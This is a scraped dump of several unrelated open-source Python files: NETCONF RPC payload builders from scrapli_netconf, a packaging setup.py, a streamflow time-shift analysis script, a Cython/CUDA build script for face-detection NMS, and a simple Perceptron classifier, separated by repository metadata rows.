Handle pre "get" tasks for consistency between sync/async versions
*NOTE*
The channel input (filter_) is loaded up as an lxml etree element here, this is done with a
parser that removes whitespace. This has a somewhat undesirable effect of making any
"pretty" input not pretty, however... after we load the xml object (which we do to validate
that it is valid xml) we dump that xml object back to a string to be used as the actual
raw payload we send down the channel, which means we are sending "flattened" (not pretty/
indented xml) to the device. This is important it seems! Some devices seme to not mind
having the "nicely" formatted input (pretty xml). But! On devices that "echo" the inputs
back -- sometimes the device will respond to our rpc without "finishing" echoing our inputs
to the device, this breaks the core "read until input" processing that scrapli always does.
For whatever reason if there are no line breaks this does not seem to happen? /shrug. Note
that this comment applies to all of the "pre" methods that we parse a filter/payload!
Args:
filter_: string filter to apply to the get
filter_type: type of filter; subtree|xpath
Returns:
NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
channel inputs (string and xml)
Raises:
N/A
"""
self.logger.debug(
f"Building payload for 'get' operation. filter_type: {filter_type}, filter_: {filter_}"
)
# build base request and insert the get element
xml_request = self._build_base_elem()
xml_get_element = etree.fromstring(NetconfBaseOperations.GET.value)
xml_request.insert(0, xml_get_element)
# build filter element
xml_filter_elem = self._build_filter(filter_=filter_, filter_type=filter_type)
# insert filter element into parent get element
get_element = xml_request.find("get")
get_element.insert(0, xml_filter_elem)
channel_input = self._finalize_channel_input(xml_request=xml_request)
response = NetconfResponse(
host=self.host,
channel_input=channel_input.decode(),
xml_input=xml_request,
netconf_version=self.netconf_version,
strip_namespaces=self.strip_namespaces,
)
self.logger.debug(f"Built payload for 'get' operation. Payload: {channel_input.decode()}")
return response
def _pre_get_config(
self,
source: str = "running",
filter_: Optional[str] = None,
filter_type: str = "subtree",
default_type: Optional[str] = None,
) -> NetconfResponse:
"""
Handle pre "get_config" tasks for consistency between sync/async versions
Args:
source: configuration source to get; typically one of running|startup|candidate
filter_: string of filter(s) to apply to configuration
filter_type: type of filter; subtree|xpath
default_type: string of with-default mode to apply when retrieving configuration
Returns:
NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
channel inputs (string and xml)
Raises:
N/A
"""
self.logger.debug(
f"Building payload for 'get-config' operation. source: {source}, filter_type: "
f"{filter_type}, filter: {filter_}, default_type: {default_type}"
)
self._validate_get_config_target(source=source)
# build base request and insert the get-config element
xml_request = self._build_base_elem()
xml_get_config_element = etree.fromstring(
NetconfBaseOperations.GET_CONFIG.value.format(source=source), parser=self.xml_parser
)
xml_request.insert(0, xml_get_config_element)
if filter_ is not None:
xml_filter_elem = self._build_filter(filter_=filter_, filter_type=filter_type)
# insert filter element into parent get element
get_element = xml_request.find("get-config")
# insert *after* source, otherwise juniper seems to gripe, maybe/probably others as well
get_element.insert(1, xml_filter_elem)
if default_type is not None:
xml_with_defaults_elem = self._build_with_defaults(default_type=default_type)
get_element = xml_request.find("get-config")
get_element.insert(2, xml_with_defaults_elem)
channel_input = self._finalize_channel_input(xml_request=xml_request)
response = NetconfResponse(
host=self.host,
channel_input=channel_input.decode(),
xml_input=xml_request,
netconf_version=self.netconf_version,
strip_namespaces=self.strip_namespaces,
)
self.logger.debug(
f"Built payload for 'get-config' operation. Payload: {channel_input.decode()}"
)
return response
def _pre_edit_config(self, config: str, target: str = "running") -> NetconfResponse:
"""
Handle pre "edit_config" tasks for consistency between sync/async versions
Args:
config: configuration to send to device
target: configuration source to target; running|startup|candidate
Returns:
NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
channel inputs (string and xml)
Raises:
N/A
"""
self.logger.debug(
f"Building payload for 'edit-config' operation. target: {target}, config: {config}"
)
self._validate_edit_config_target(target=target)
xml_config = etree.fromstring(config, parser=self.xml_parser)
# build base request and insert the edit-config element
xml_request = self._build_base_elem()
xml_edit_config_element = etree.fromstring(
NetconfBaseOperations.EDIT_CONFIG.value.format(target=target)
)
xml_request.insert(0, xml_edit_config_element)
# insert parent filter element to first position so that target stays first just for nice
# output/readability
edit_config_element = xml_request.find("edit-config")
edit_config_element.insert(1, xml_config)
channel_input = self._finalize_channel_input(xml_request=xml_request)
response = NetconfResponse(
host=self.host,
channel_input=channel_input.decode(),
xml_input=xml_request,
netconf_version=self.netconf_version,
strip_namespaces=self.strip_namespaces,
)
self.logger.debug(
f"Built payload for 'edit-config' operation. Payload: {channel_input.decode()}"
)
return response
def _pre_delete_config(self, target: str = "running") -> NetconfResponse:
"""
Handle pre "edit_config" tasks for consistency between sync/async versions
Args:
target: configuration source to target; startup|candidate
Returns:
NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
channel inputs (string and xml)
Raises:
N/A
"""
self.logger.debug(f"Building payload for 'delete-config' operation. target: {target}")
self._validate_delete_config_target(target=target)
xml_request = self._build_base_elem()
xml_validate_element = etree.fromstring(
NetconfBaseOperations.DELETE_CONFIG.value.format(target=target), parser=self.xml_parser
)
xml_request.insert(0, xml_validate_element)
channel_input = self._finalize_channel_input(xml_request=xml_request)
response = NetconfResponse(
host=self.host,
channel_input=channel_input.decode(),
xml_input=xml_request,
netconf_version=self.netconf_version,
strip_namespaces=self.strip_namespaces,
)
self.logger.debug(
f"Built payload for 'delete-config' operation. Payload: {channel_input.decode()}"
)
return response
def _pre_commit(self) -> NetconfResponse:
"""
Handle pre "commit" tasks for consistency between sync/async versions
Args:
N/A
Returns:
NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
channel inputs (string and xml)
Raises:
N/A
"""
self.logger.debug("Building payload for 'commit' operation")
xml_request = self._build_base_elem()
xml_commit_element = etree.fromstring(
NetconfBaseOperations.COMMIT.value, parser=self.xml_parser
)
xml_request.insert(0, xml_commit_element)
channel_input = self._finalize_channel_input(xml_request=xml_request)
response = NetconfResponse(
host=self.host,
channel_input=channel_input.decode(),
xml_input=xml_request,
netconf_version=self.netconf_version,
strip_namespaces=self.strip_namespaces,
)
self.logger.debug(
f"Built payload for 'commit' operation. Payload: {channel_input.decode()}"
)
return response
def _pre_discard(self) -> NetconfResponse:
"""
Handle pre "discard" tasks for consistency between sync/async versions
Args:
N/A
Returns:
NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
channel inputs (string and xml)
Raises:
N/A
"""
self.logger.debug("Building payload for 'discard' operation.")
xml_request = self._build_base_elem()
xml_commit_element = etree.fromstring(
NetconfBaseOperations.DISCARD.value, parser=self.xml_parser
)
xml_request.insert(0, xml_commit_element)
channel_input = self._finalize_channel_input(xml_request=xml_request)
response = NetconfResponse(
host=self.host,
channel_input=channel_input.decode(),
xml_input=xml_request,
netconf_version=self.netconf_version,
strip_namespaces=self.strip_namespaces,
)
self.logger.debug(
f"Built payload for 'discard' operation. Payload: {channel_input.decode()}"
)
return response
def _pre_lock(self, target: str) -> NetconfResponse:
"""
Handle pre "lock" tasks for consistency between sync/async versions
Args:
target: configuration source to target; running|startup|candidate
Returns:
NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
channel inputs (string and xml)
Raises:
N/A
"""
self.logger.debug("Building payload for 'lock' operation.")
self._validate_edit_config_target(target=target)
xml_request = self._build_base_elem()
xml_lock_element = etree.fromstring(
NetconfBaseOperations.LOCK.value.format(target=target), parser=self.xml_parser
)
xml_request.insert(0, xml_lock_element)
channel_input = self._finalize_channel_input(xml_request=xml_request)
response = NetconfResponse(
host=self.host,
channel_input=channel_input.decode(),
xml_input=xml_request,
netconf_version=self.netconf_version,
strip_namespaces=self.strip_namespaces,
)
self.logger.debug(f"Built payload for 'lock' operation. Payload: {channel_input.decode()}")
return response
def _pre_unlock(self, target: str) -> NetconfResponse:
"""
Handle pre "unlock" tasks for consistency between sync/async versions
Args:
target: configuration source to target; running|startup|candidate
Returns:
NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
channel inputs (string and xml)
Raises:
N/A
"""
self.logger.debug("Building payload for 'unlock' operation.")
self._validate_edit_config_target(target=target)
xml_request = self._build_base_elem()
xml_lock_element = etree.fromstring(
NetconfBaseOperations.UNLOCK.value.format(target=target, parser=self.xml_parser)
)
xml_request.insert(0, xml_lock_element)
channel_input = self._finalize_channel_input(xml_request=xml_request)
response = NetconfResponse(
host=self.host,
channel_input=channel_input.decode(),
xml_input=xml_request,
netconf_version=self.netconf_version,
strip_namespaces=self.strip_namespaces,
)
self.logger.debug(
f"Built payload for 'unlock' operation. Payload: {channel_input.decode()}"
)
return response
def _pre_rpc(self, filter_: Union[str, _Element]) -> NetconfResponse:
"""
Handle pre "rpc" tasks for consistency between sync/async versions
Args:
filter_: filter/rpc to execute
Returns:
NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
channel inputs (string and xml)
Raises:
N/A
"""
self.logger.debug("Building payload for 'rpc' operation.")
xml_request = self._build_base_elem()
# build filter element
if isinstance(filter_, str):
xml_filter_elem = etree.fromstring(filter_, parser=self.xml_parser)
else:
xml_filter_elem = filter_
# insert filter element
xml_request.insert(0, xml_filter_elem)
channel_input = self._finalize_channel_input(xml_request=xml_request)
response = NetconfResponse(
host=self.host,
channel_input=channel_input.decode(),
xml_input=xml_request,
netconf_version=self.netconf_version,
strip_namespaces=self.strip_namespaces,
)
self.logger.debug(f"Built payload for 'rpc' operation. Payload: {channel_input.decode()}")
return response
def _pre_validate(self, source: str) -> NetconfResponse:
"""
Handle pre "validate" tasks for consistency between sync/async versions
Args:
source: configuration source to validate; typically one of running|startup|candidate
Returns:
NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
channel inputs (string and xml)
Raises:
CapabilityNotSupported: if 'validate' capability does not exist
"""
self.logger.debug("Building payload for 'validate' operation.")
if not any(
cap in self.server_capabilities
for cap in (
"urn:ietf:params:netconf:capability:validate:1.0",
"urn:ietf:params:netconf:capability:validate:1.1",
)
):
msg = "validate requested, but is not supported by the server"
self.logger.exception(msg)
raise CapabilityNotSupported(msg)
self._validate_edit_config_target(target=source)
xml_request = self._build_base_elem()
xml_validate_element = etree.fromstring(
NetconfBaseOperations.VALIDATE.value.format(source=source), parser=self.xml_parser
)
xml_request.insert(0, xml_validate_element)
channel_input = self._finalize_channel_input(xml_request=xml_request)
response = NetconfResponse(
host=self.host,
channel_input=channel_input.decode(),
xml_input=xml_request,
netconf_version=self.netconf_version,
strip_namespaces=self.strip_namespaces,
)
self.logger.debug(
f"Built payload for 'validate' operation. Payload: {channel_input.decode()}"
)
return response
def _pre_copy_config(self, source: str, target: str) -> NetconfResponse:
"""
Handle pre "copy_config" tasks for consistency between sync/async versions
Note that source is not validated/checked since it could be a url or a full configuration
element itself.
Args:
source: configuration, url, or datastore to copy into the target datastore
target: copy config destination/target; typically one of running|startup|candidate
Returns:
NetconfResponse: scrapli_netconf NetconfResponse object containing all the necessary
channel inputs (string and xml)
Raises:
N/A
"""
self.logger.debug("Building payload for 'copy_config' operation.")
self._validate_edit_config_target(target=target)
xml_request = self._build_base_elem()
xml_validate_element = etree.fromstring(
NetconfBaseOperations.COPY_CONFIG.value.format(source=source, target=target),
parser=self.xml_parser,
)
xml_request.insert(0, xml_validate_element)
channel_input = self._finalize_channel_input(xml_request=xml_request)
response = NetconfResponse(
host=self.host,
channel_input=channel_input.decode(),
xml_input=xml_request,
netconf_version=self.netconf_version,
strip_namespaces=self.strip_namespaces,
)
self.logger.debug(
f"Built payload for 'copy-config' operation. Payload: {channel_input.decode()}"
)
return response
| [
"hwane123@gmail.com"
] | hwane123@gmail.com |
c789bf1ce56799741bfb4bc22258282120e24113 | 0b5fa83ec76ec18ac72bcb38b2e62750db694a8c | /setup.py | 6606088b1e9ec27615b186152a47f116b5535497 | [
"MIT"
] | permissive | j1o1h1n/materialize-tornado-quickstart | e19834178e60bce07c6eca1467ceb4c347eacb55 | 43a62b86562094f8a8e0ce2e728f4fde1ac3ce69 | refs/heads/master | 2021-06-16T06:36:28.538772 | 2019-06-30T06:19:23 | 2019-06-30T06:19:23 | 193,901,472 | 0 | 0 | MIT | 2021-04-20T18:13:08 | 2019-06-26T12:37:24 | HTML | UTF-8 | Python | false | false | 1,780 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
try:
from setuptools import setup, find_packages
except ImportError:
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup, find_packages
PYPI_RST_FILTERS = (
# Replace code-blocks
(r'\.\.\s? code-block::\s*(\w|\+)+', '::'),
# Replace image
(r'\.\.\s? image::.*', ''),
# Remove travis ci badge
(r'.*travis-ci\.org/.*', ''),
# Remove pypip.in badges
(r'.*pypip\.in/.*', ''),
(r'.*crate\.io/.*', ''),
(r'.*coveralls\.io/.*', ''),
)
def rst(filename):
'''
Load rst file and sanitize it for PyPI.
Remove unsupported github tags:
- code-block directive
- travis ci build badge
'''
content = open(filename).read()
for regex, replacement in PYPI_RST_FILTERS:
content = re.sub(regex, replacement, content)
return content
def required(filename):
with open(filename) as f:
packages = f.read().splitlines()
return packages
setup(
name="materialize-tornado-quickstart",
version="1.0.2",
description="A quickstart template for a materializecss tornado webapp",
long_description=rst("README.rst"),
author="John Lehmann",
author_email="j1o1h1n@yahoo.com",
url="https://github.com/j1o1h1n/materialize-tornado-quickstart",
license="MIT License",
install_requires=required('requirements/base.txt'),
setup_requires=[],
tests_require=[
'pytest',
],
test_suite='tests',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
scripts=[],
entry_points={
'console_scripts': [
"mywebapp = mywebapp.website:main",
],
},
classifiers=[
'Programming Language :: Python',
],
)
| [
"j1o1h1n@gmail.com"
] | j1o1h1n@gmail.com |
b65e4101ce92995b1f2f4408b8c0ceed88f6c64e | 8675263285c0d246169aebe831ce461e6d94dec3 | /Qgen/timeShiftModel.py | 97c5531f624401de96074f9a39b0781ab2427ed2 | [] | no_license | ananya-g9/UCRB_analysis | 61ad7d8e7a34a7605a5c31088a09c02344a0e5d3 | fa6d74df139df419b57e8f6d288bbdcd4c5bbee4 | refs/heads/master | 2022-09-11T07:24:41.882730 | 2020-06-04T13:46:26 | 2020-06-04T13:46:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,910 | py | import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import matplotlib
def readFiles(filename, firstLine, numSites):
# read in all monthly flows and re-organize into nyears x 12 x nsites matrix
with open(filename,'r') as f:
all_split_data = [x.split('.') for x in f.readlines()]
f.close()
numYears = int((len(all_split_data)-firstLine)/numSites)
MonthlyQ = np.zeros([12*numYears,numSites])
sites = []
for i in range(numYears):
for j in range(numSites):
index = firstLine + i*numSites + j
sites.append(all_split_data[index][0].split()[1])
all_split_data[index][0] = all_split_data[index][0].split()[2]
MonthlyQ[i*12:(i+1)*12,j] = np.asfarray(all_split_data[index][0:12], float)
MonthlyQ = np.reshape(MonthlyQ,[int(np.shape(MonthlyQ)[0]/12),12,numSites])
return MonthlyQ
def revertCumSum(cumulative):
'''Revert cumulative sum. Modified from https://codereview.stackexchange.com/questions/117183/extracting-original-values-from-cumulative-sum-values'''
output = [0] * len(cumulative)
for i,e in reversed(list(enumerate(cumulative))):
output[i]=cumulative[i] - cumulative[i-1]
output[0]=cumulative[0]
return output
# read in monthly flows at all sites
MonthlyQ = readFiles('cm2015x.xbm', 16, 208)
LastNodeFractions = np.zeros([2013-1951,61,12])
for i in range(2013-1951):
LastNodeFractions[i,0,:] = MonthlyQ[43+i,:,-1]/np.sum(MonthlyQ[43+i,:,-1])
# read in daily flows at last node
LastNodeQ = pd.read_csv('CO_River_UT_State_line.csv')
LastNodeQ['Date'] = pd.to_datetime(LastNodeQ['Date'],format="%Y-%m-%d")
LastNodeQ['Year'] = LastNodeQ['Date'].dt.year
LastNodeQ['Month'] = LastNodeQ['Date'].dt.month
# increase year by 1 for Oct->Dec to convert to water year
indices = np.where(LastNodeQ['Month'] >= 10)[0]
LastNodeQ['Year'][indices] += 1
years = np.unique(LastNodeQ['Year'])
for year in years:
flows = np.where(LastNodeQ['Year']==year)[0]
plt.plot(range(len(flows)),LastNodeQ['Flow'][flows])
#plt.savefig('Year' + str(year) + 'Hydrograph.png')
#plt.clf()
# create column of dataframe for shifted flows
LastNodeQ['ShiftedFlow'] = LastNodeQ['Flow']
shifts = range(1,61) # example with 1 mo = 30 days
for shift in shifts:
LastNodeQ['ShiftedFlow'][0:-shift] = LastNodeQ['Flow'][shift::]
MonthlyTotals = LastNodeQ.set_index('Date').resample('M').sum()
MonthlyTotals['Year'] = MonthlyTotals.index.year
MonthlyTotals['Month'] = MonthlyTotals.index.month
# reduce year by 1 for Jan->Sept to conver to water year
indices = np.where(MonthlyTotals['Month'] >= 10)[0]
MonthlyTotals['Year'][indices] += 1
# convert Monthly totals from cfs to acre-ft
MonthlyTotals['Flow'] = MonthlyTotals['Flow'] * 2.29569E-05 * 86400
MonthlyTotals['ShiftedFlow'] = MonthlyTotals['ShiftedFlow'] * 2.29569E-05 * 86400
for i in range(len(years)-1):
year = years[i]
flows = np.where(MonthlyTotals['Year']==year)[0]
# calculate cumulative flows at gage w/ and w/o the shift, and of the naturalized flows
gage_cdf = np.cumsum(MonthlyTotals['Flow'][flows])
gage_shifted_cdf = np.cumsum(MonthlyTotals['ShiftedFlow'][flows])
natural_cdf = np.cumsum(MonthlyQ[43+i,:,-1])
# normalize cdfs to sum to 1
gage_cdf = gage_cdf/np.max(gage_cdf)
gage_shifted_cdf = gage_shifted_cdf/np.max(gage_shifted_cdf)
natural_cdf = natural_cdf/np.max(natural_cdf)
# apply same shift to natural flows as at gage
natural_shifted_cdf = natural_cdf + gage_shifted_cdf - gage_cdf
# compute monthly fractional contribution
LastNodeFractions[i,shift,:] = revertCumSum(natural_shifted_cdf)
# for each year, make a plot of the base and shifted hydrographs
cmap = matplotlib.cm.get_cmap('coolwarm')
for i in range(len(years)-1):
plt.plot(MonthlyQ[43+i,:,-1])
for shift in shifts:
plt.plot(np.sum(MonthlyQ[43+i,:,-1]) * LastNodeFractions[i,shift,:], c=cmap(shift/61))
#plt.savefig('ShiftedFlows/WY' + str(i+1951) + '.png')
#plt.clf()
# for years 1909-1951, find nearest neighbor in terms of frational contribution and apply same shifts
LastNodeFractions_preRecord = np.zeros([1952-1909,61,12])
for i in range(1952-1909):
d = np.zeros(2013-1951)
for j in range(2013-1951):
for k in range(12):
d[j] += (MonthlyQ[i,k,-1]/np.sum(MonthlyQ[i,:,-1]) - MonthlyQ[j+43,k,-1]/np.sum(MonthlyQ[j+43,:,-1]))**2
idx = np.argmin(d)
LastNodeFractions_preRecord[i,:,:] = LastNodeFractions[idx,:,:]
# prepend LastNodeFractions_preRecord to MonthlyFraactions
LastNodeFractions = np.concatenate((LastNodeFractions_preRecord,LastNodeFractions),0)
np.save('LastNodeFractions',LastNodeFractions) | [
"jquinn@DESKTOP-Q2B5352.localdomain"
] | jquinn@DESKTOP-Q2B5352.localdomain |
81c5cd967cb9946b4d31ca4175e77772cb7a9538 | 7b62bc3cdb002d193c70b48dfe3decfe347aa551 | /04_example/01_face_detection/src/rcnn/cython/setup.py | 455368769bf9563c9ce72dd4e0d3be90e62c3606 | [] | no_license | gaohank/python-coding-proj | 09961f334340c82c953b0d04a124e7d6c45a9086 | 0cf0aaae24c80326c0c09a3aa9dd2251f9928b61 | refs/heads/master | 2021-01-14T06:08:23.686766 | 2020-06-29T00:41:53 | 2020-06-29T00:41:53 | 242,491,009 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,056 | py | # --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
import os
from os.path import join as pjoin
from setuptools import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
import numpy as np
def find_in_path(name, path):
"Find a file in a search path"
# Adapted fom
# http://code.activestate.com/recipes/52224-find-a-file-given-a-search-path/
for dir in path.split(os.pathsep):
binpath = pjoin(dir, name)
if os.path.exists(binpath):
return os.path.abspath(binpath)
return None
def locate_cuda():
"""Locate the CUDA environment on the system
Returns a dict with keys 'home', 'nvcc', 'include', and 'lib64'
and values giving the absolute path to each directory.
Starts by looking for the CUDAHOME env variable. If not found, everything
is based on finding 'nvcc' in the PATH.
"""
# first check if the CUDAHOME env variable is in use
if 'CUDAHOME' in os.environ:
home = os.environ['CUDAHOME']
nvcc = pjoin(home, 'bin', 'nvcc')
else:
# otherwise, search the PATH for NVCC
default_path = pjoin(os.sep, 'usr', 'local', 'cuda', 'bin')
nvcc = find_in_path('nvcc', os.environ['PATH'] + os.pathsep + default_path)
if nvcc is None:
raise EnvironmentError('The nvcc binary could not be '
'located in your $PATH. Either add it to your path, or set $CUDAHOME')
home = os.path.dirname(os.path.dirname(nvcc))
cudaconfig = {'home': home, 'nvcc': nvcc,
'include': pjoin(home, 'include'),
'lib64': pjoin(home, 'lib64')}
for k, v in cudaconfig.items():
if not os.path.exists(v):
raise EnvironmentError('The CUDA %s path could not be located in %s' % (k, v))
return cudaconfig
# Test if cuda could be foun
try:
CUDA = locate_cuda()
except EnvironmentError:
CUDA = None
# Obtain the numpy include directory. This logic works across numpy versions.
try:
numpy_include = np.get_include()
except AttributeError:
numpy_include = np.get_numpy_include()
def customize_compiler_for_nvcc(self):
"""inject deep into distutils to customize how the dispatch
to gcc/nvcc works.
If you subclass UnixCCompiler, it's not trivial to get your subclass
injected in, and still have the right customizations (i.e.
distutils.sysconfig.customize_compiler) run on it. So instead of going
the OO route, I have this. Note, it's kindof like a wierd functional
subclassing going on."""
# tell the compiler it can processes .cu
self.src_extensions.append('.cu')
# save references to the default compiler_so and _comple methods
# 注释1:windows下没有so库
# default_compiler_so = self.compiler_so
super = self._compile
# now redefine the _compile method. This gets executed for each
# object but distutils doesn't have the ability to change compilers
# based on source extension: we add it.
def _compile(obj, src, ext, cc_args, extra_postargs, pp_opts):
if os.path.splitext(src)[1] == '.cu':
# use the cuda for .cu files
self.set_executable('compiler_so', CUDA['nvcc'])
# use only a subset of the extra_postargs, which are 1-1 translated
# from the extra_compile_args in the Extension class
postargs = extra_postargs['nvcc']
else:
postargs = extra_postargs['gcc']
super(obj, src, ext, cc_args, postargs, pp_opts)
# reset the default compiler_so, which we might have changed for cuda
# 注释1:同上
# self.compiler_so = default_compiler_so
# inject our redefined _compile method into the class
self._compile = _compile
# 注释2:设置编译args
nvcc_compile_args = ['-O', '--ptxas-options=-v', '-arch=sm_35', '-c', '--compiler-options=-fPIC']
nvcc_compile_args = os.environ.get('NVCCFLAGS', '').split() + nvcc_compile_args
# run the customize_compiler
class custom_build_ext(build_ext):
def build_extensions(self):
customize_compiler_for_nvcc(self.compiler)
build_ext.build_extensions(self)
ext_modules = [
Extension(
"bbox",
["bbox.pyx"],
extra_compile_args=nvcc_compile_args,
include_dirs=[numpy_include]
),
Extension(
"anchors",
["anchors.pyx"],
extra_compile_args=nvcc_compile_args,
include_dirs=[numpy_include]
),
Extension(
"cpu_nms",
["cpu_nms.pyx"],
extra_compile_args=nvcc_compile_args,
include_dirs=[numpy_include]
),
]
if CUDA is not None:
ext_modules.append(
Extension('gpu_nms',
['nms_kernel.cu', 'gpu_nms.pyx'],
library_dirs=[CUDA['lib64']],
libraries=['cudart'],
language='c++',
runtime_library_dirs=[CUDA['lib64']],
# this syntax is specific to this build system
# we're only going to use certain compiler args with nvcc and not with
# gcc the implementation of this trick is in customize_compiler() below
extra_compile_args={'gcc': ["-Wno-unused-function"],
'nvcc': ['-arch=sm_35',
'--ptxas-options=-v',
'-c',
'--compiler-options',
"'-fPIC'"]},
include_dirs=[numpy_include, CUDA['include']]
)
)
else:
print('Skipping GPU_NMS')
setup(
name='frcnn_cython',
ext_modules=ext_modules,
# inject our custom trigger
cmdclass={'build_ext': custom_build_ext},
)
| [
"songling.gao@ikang.com"
] | songling.gao@ikang.com |
5abea72a01aa40f4004899a546be474be23f30d4 | 8f263874dc2d5c15c79417301f8dd21176129f86 | /python_tips/Perceptron.py | 5a7da05f0ed44c12e52a3529be2322135c722146 | [
"BSD-3-Clause"
] | permissive | LucasDatilioCarderelli/examples | 8768bbd303f6216ce08e0c95f6efbeabf4a003e7 | d1847272384723d7f4bb233e5947ff1f1ddfe781 | refs/heads/master | 2022-11-11T16:55:41.293787 | 2020-06-22T03:12:35 | 2020-06-22T03:12:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,566 | py | '''
Este projeto esta disponivel no GiHub de Marcos castro de Sousa
Implementação da rede neural Perceptron
w = w + N * (d(k) - y) * x(k)
'''
import random, copy
class Perceptron:
def __init__(self, amostras, saidas, taxa_aprendizado=0.1, epocas=1000, limiar=-1):
self.amostras = amostras # todas as amostras
self.saidas = saidas # saídas respectivas de cada amostra
self.taxa_aprendizado = taxa_aprendizado # taxa de aprendizado (entre 0 e 1)
self.epocas = epocas # número de épocas
self.limiar = limiar # limiar
self.num_amostras = len(amostras) # quantidade de amostras
self.num_amostra = len(amostras[0]) # quantidade de elementos por amostra
self.pesos = [] # vetor de pesos
# função para treinar a rede
def treinar(self):
# adiciona -1 para cada uma das amostras
for amostra in self.amostras:
amostra.insert(0, -1)
# inicia o vetor de pesos com valores aleatórios
for i in range(self.num_amostra):
self.pesos.append(random.random())
# insere o limiar no vetor de pesos
self.pesos.insert(0, self.limiar)
# inicia o contador de epocas
num_epocas = 0
while True:
erro = False # o erro inicialmente inexiste
# para todas as amostras de treinamento
for i in range(self.num_amostras):
u = 0
'''
realiza o somatório, o limite (self.amostra + 1)
é porque foi inserido o -1 para cada amostra
'''
for j in range(self.num_amostra + 1):
u += self.pesos[j] * self.amostras[i][j]
# obtém a saída da rede utilizando a função de ativação
y = self.sinal(u)
# verifica se a saída da rede é diferente da saída desejada
if y != self.saidas[i]:
# calcula o erro: subtração entre a saída desejada e a saída da rede
erro_aux = self.saidas[i] - y
# faz o ajuste dos pesos para cada elemento da amostra
for j in range(self.num_amostra + 1):
self.pesos[j] = self.pesos[j] + self.taxa_aprendizado * erro_aux * self.amostras[i][j]
erro = True # ainda existe erro
# incrementa o número de épocas
num_epocas += 1
# critério de parada é pelo número de épocas ou se não existir erro
if num_epocas > self.epocas or not erro:
break
# função utilizada para testar a rede
# recebe uma amostra a ser classificada e os nomes das classes
# utiliza a função sinal, se é -1 então é classe1, senão é classe2
def testar(self, amostra, classe1, classe2):
# insere o -1
amostra.insert(0, -1)
# utiliza o vetor de pesos que foi ajustado na fase de treinamento
u = 0
for i in range(self.num_amostra + 1):
u += self.pesos[i] * amostra[i]
# calcula a saída da rede
y = self.sinal(u)
# verifica a qual classe pertence
if y == -1:
print('A amostra pertence a classe %s' % classe1)
else:
print('A amostra pertence a classe %s' % classe2)
# função de ativação: degrau bipolar (sinal)
def sinal(self, u):
return 1 if u >= 0 else -1
if __name__ == "__main__":
print('\nA ou B?\n')
# amostras: um total de 4 amostras
amostras = [[0.1, 0.4, 0.7], [0.3, 0.7, 0.2],
[0.6, 0.9, 0.8], [0.5, 0.7, 0.1]]
# saídas desejadas de cada amostra
saidas = [1, -1, -1, 1]
# conjunto de amostras de testes
testes = copy.deepcopy(amostras)
# cria uma rede Perceptron
rede = Perceptron(amostras=amostras, saidas=saidas,
taxa_aprendizado=0.1, epocas=1000)
# treina a rede
rede.treinar()
# testando a rede
for teste in testes:
rede.testar(teste, 'A', 'B') | [
"prof.israel@gmail.com"
] | prof.israel@gmail.com |
d2ae07fd11fe4e1e7d1743d988d4927f80c9e409 | d4b49195beba64afee0b6bbffdca304a9bd7e25e | /3_Deep_Learning_Registration/requirements.py | aa64d23d01901c1a8786ce443cfafbf5b821653f | [] | no_license | xiaolifeimianbao/Tutorial-Medical-Image-Registration | 6921256a25f3a8f9595acc03a06237d80efce2cc | 7ea9803e0a2457416f613d94640155dfc88e410a | refs/heads/master | 2022-04-05T07:41:00.966706 | 2019-12-28T23:39:02 | 2019-12-28T23:39:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 545 | py | # VERSION 0.0.0
# ------ AUTHOR: NaTaN ANDRADE ------
# Universidade Federal de São Paulo (UNIFESP)
# Instituto de Ciência e Tecnologia (ICT)
# São José dos Campos (SJC)
# Estado de São Paulo (SP)
# BRASIL
#For install virtualenv: pip install -r requirements.txt
pip install tensorflow
pip install tensorflow-gpu
pip install keras
pip install dltk
pip install niftynet
pip install SimpleITK
pip install sympy
pip install nibabel
pip install pydicom
pip install medpy
pip install -U scikit-learn
pip install pydot
pip install graphviz
| [
"noreply@github.com"
] | noreply@github.com |
52875bb3e78a1bda06ee3642b5d4c9156ba64ac9 | 55b57d64ec547869835334318f3059fbb507558c | /Fred2/Data/pssms/tepitopepan/mat/DRB1_0480_9.py | f6f1ff603742b33032918eb4444a0a117596dd3a | [
"BSD-3-Clause"
